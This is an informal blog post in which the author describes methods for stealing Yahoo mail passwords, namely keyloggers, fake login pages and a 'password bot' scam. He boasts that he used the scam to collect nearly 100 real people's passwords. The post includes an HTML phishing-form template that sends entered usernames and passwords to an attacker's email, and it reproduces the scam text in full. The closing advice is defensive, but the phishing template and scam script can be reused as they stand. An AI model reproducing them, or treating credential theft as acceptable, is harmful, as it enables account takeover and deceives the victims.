Today I am going to discuss about what I did on last week. Before this let me tell you that I am very much interested in hacking. I mean I want to learn hacking techniques that was used in history by other hackers. In this series, in previous week I was searching about what are all the techniques that were used for the hackers to hack the online web mail accounts like Yahoo.
So I googled and found a very few techniques that were used. The most of the techniques are all known to me like Key-loggers, Dummy pages and Social Engineering. Last week using social engineering technique I got the password of nearly 100 people on the net. Now let me tell you that how these three techniques works and how can you defend yourself.
The key loggers are very cheap kind of hacking utility that is used by script kiddies. It’s software that logs every key press on a particular machine. So using this you can record the keys and u can get password of any kind of form based authentication scheme, Irrespective of the authentication technique used by your server program. Form based authentication means the authentication scheme is scheme that takes user name and password from user.
So may be your friend will install a key logger on your machine when you are away from your machine (that is left open). Key loggers are can also be presents on Internet Café Machine.
Dummy pages are the false login page that looks very similar to original page and that is having some different Action value. Means it will be a fake HTML form page whose post method will be set to post and action will be configured in such a way that when you submit the information it will be sent to some e-mail Id. This may be the case that you will try to login on these pages and your password will be posted to your friend’s (hacker) email.
Here is a simple example of Dummy page
<form action="Your SMTP URL" method="POST">
<input type="Hidden" name="to" value="Your email Id">
<input type="Hidden" name="subject" value="Subject of email ">
<input type="text" name="user" value="">
<input type="text" name="pass" value="">
<input type="submit" name="submitbutton" value="">
The last method that I come across was a social Engineering which deceives the user by telling them a very easy method to hack yahoo which describes like this.
1.First send a letter to firstname.lastname@example.org, second within the
Subject heading place the word "Password".
2. Then in the text field place the YahooID of the person that you
want to hack in small letters.
3.Then and place your own yahoo account information such as: "My
login:My password" (a semicolon makes it easier for the bot to
recognize). This way the bot can verify that your account actually
exists. And then supplies you with the password for the person's
account that you want it for. Here is example:
So all the people who want to hack someone Yahoo ID will be hacked itself.
Can you believe this, this method is posted on the internet few years back but still I got many Idiots who sent me their password.
If anyone a claim that he can get your yahoo password is either dam fool or he is dam intelligent who can really hack the existing algorithms. Why I am telling this because the password stored on the yahoo server is neither exactly your plain password nor its encrypted password, but it’s the hash of your password that can not be decrypted back unless you crack it by some brute force attack. So guys even the yahoo administrator can not get your password.
But if someone still hacking your yahoo mail it’s totally due to your mistake. I mean either you logged on the machine which has keyboard logger or you entered your password on some dummy page.
So be claver enough that someone can not hack your password.